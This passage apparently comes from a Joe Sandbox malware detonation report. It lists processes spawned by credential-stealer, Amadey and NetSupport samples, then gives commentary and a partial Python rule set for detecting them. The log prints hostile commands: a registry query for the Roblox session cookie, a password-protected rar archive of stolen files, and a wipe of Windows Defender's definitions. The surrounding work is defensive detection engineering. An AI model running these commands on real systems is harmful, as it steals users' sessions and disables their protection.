                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:67
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:68
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:69
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:70
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:getmac
                                                                                                                                                                                                                                        Imagebase:0x7ff667a60000
                                                                                                                                                                                                                                        File size:90'112 bytes
                                                                                                                                                                                                                                        MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:71
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                        Imagebase:0x7ff7a3bb0000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:72
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                                                                                                                                                                                                                        Imagebase:0x7ff7b3a80000
                                                                                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6d7870000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:77
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:78
Start time:16:10:54
Start date:19/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6c98f0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:79
Start time:16:10:55
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:16:10:55
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:16:10:55
Start date:19/12/2024
Path:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe"
Imagebase:0x130000
File size:2'138'232 bytes
MD5 hash:E5F8753995C0B30B827AA2B17F3E1D22
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 53%, ReversingLabs
Has exited:true

Target ID:82
Start time:16:10:55
Start date:19/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6c98f0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:83
Start time:16:10:56
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:84
                                                                                                                                                                                                                                        Start time:16:10:56
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2941270961.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2942245341.000000000135B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:85
                                                                                                                                                                                                                                        Start time:16:10:57
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\Public\Netstat\FuturreApp.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Netstat\FuturreApp.exe"
                                                                                                                                                                                                                                        Imagebase:0x920000
                                                                                                                                                                                                                                        File size:105'848 bytes
                                                                                                                                                                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\FuturreApp.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:86
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:87
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:88
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:89
                                                                                                                                                                                                                                        Start time:16:11:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                        File size:3'037'184 bytes
MD5 hash:CD7686B11754D77B8722880A1A3A9A43
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000059.00000003.2745055454.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:90
Start time:16:11:00
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:16:11:00
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:16:11:00
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:93
Start time:16:11:02
Start date:19/12/2024
Path:C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
Imagebase:0xbe0000
File size:776'832 bytes
MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 68%, ReversingLabs
Has exited:true

Target ID:94
Start time:16:11:02
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:95
Start time:16:11:08
Start date:19/12/2024
Path:C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
Imagebase:0xbe0000
File size:776'832 bytes
MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2934892594.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2960705475.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:96
Start time:16:11:10
Start date:19/12/2024
Path:C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe"
Imagebase:0xa00000
File size:1'885'696 bytes
MD5 hash:25FB9C54265BBACC7A055174479F0B70
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 75%, ReversingLabs
Has exited:true

Target ID:97
Start time:16:11:13
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:98
Start time:16:11:13
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6a5670000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:99
                                                                                                                                                                                                                                        Start time:16:11:13
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                                                                                                                                                                                                                        Imagebase:0x7ff62b130000
                                                                                                                                                                                                                                        File size:630'736 bytes
                                                                                                                                                                                                                                        MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:100
                                                                                                                                                                                                                                        Start time:16:11:16
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                        Imagebase:0x7ff781f50000
                                                                                                                                                                                                                                        File size:468'120 bytes
                                                                                                                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:101
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:102
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:103
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic os get Caption
                                                                                                                                                                                                                                        Imagebase:0x7ff681f80000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:109
                                                                                                                                                                                                                                        Start time:16:11:19
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

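Three of the process launches above are worth an alert rather than a log line. Target ID 99 runs rar.exe out of a `_MEI<digits>` directory under the user's Temp folder, which is where PyInstaller one-file bundles unpack themselves, and uses the `-hp` switch: unlike `-p`, `-hp` encrypts the archive headers (file names) as well as the file data, and the password is supplied inline on the command line, so it is recoverable from process telemetry. The `.zip` name is cosmetic; console rar.exe writes RAR-format archives, and header encryption is a RAR-only option. Target ID 100 runs `MpCmdRun.exe -RemoveDefinitions -All`, which deletes Windows Defender's signature definitions. Target IDs 101 and 103 fetch the OS version through `wmic os get Caption`, once via `cmd.exe /c` and once directly. The conhost.exe `0xffffffff -ForceV1` launches are console-host noise that any rule set has to ignore.

The following is an added example, not part of the Joe Sandbox report, showing how a detection engineer could encode those three patterns as process-creation rules. The events are constructed from the command lines above plus one benign control (an archiver run from its install directory without `-hp`); the rule names, regular expressions and `Alert` type are this example's own and are not anything the sandbox emits.

```python
"""Process-creation rules for the three behaviours in the process list above.

Added example, not part of the Joe Sandbox report.  Events are modelled as
(image path, command line) pairs, the shape a Sysmon Event ID 1 or EDR
process-start record reduces to.
"""
import re
from dataclasses import dataclass

# Constructed events copied from the Target IDs above, plus one benign
# control (an archiver run from its install directory without header
# encryption).  Not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe",
     r'C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" '
     r'"C:\Users\user\AppData\Local\Temp\vLqBW.zip" *'),
    (r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    (r"C:\Windows\System32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c "wmic os get Caption"'),
    (r"C:\Windows\System32\wbem\WMIC.exe", r"wmic os get Caption"),
    (r"C:\Program Files\WinRAR\Rar.exe",
     r'"C:\Program Files\WinRAR\Rar.exe" a -r logs.rar C:\logs\*'),
]


@dataclass(frozen=True)
class Alert:
    rule: str
    image: str
    detail: str


# rar's -hp switch: encrypt file data *and* archive headers (file names) with
# the inline password, written either bare (-hpSecret) or quoted (-hp"Secret").
RAR_HEADER_ENCRYPTION = re.compile(r'(?:^|\s)-hp(?:"([^"]*)"|(\S+))')

# rar binary executing out of the user's Temp directory, optionally from a
# PyInstaller one-file extraction directory (_MEI followed by digits).
ARCHIVER_IN_TEMP = re.compile(
    r"\\AppData\\Local\\Temp\\(?:_MEI\d+\\)?(?:rar|winrar)\.exe$", re.IGNORECASE)

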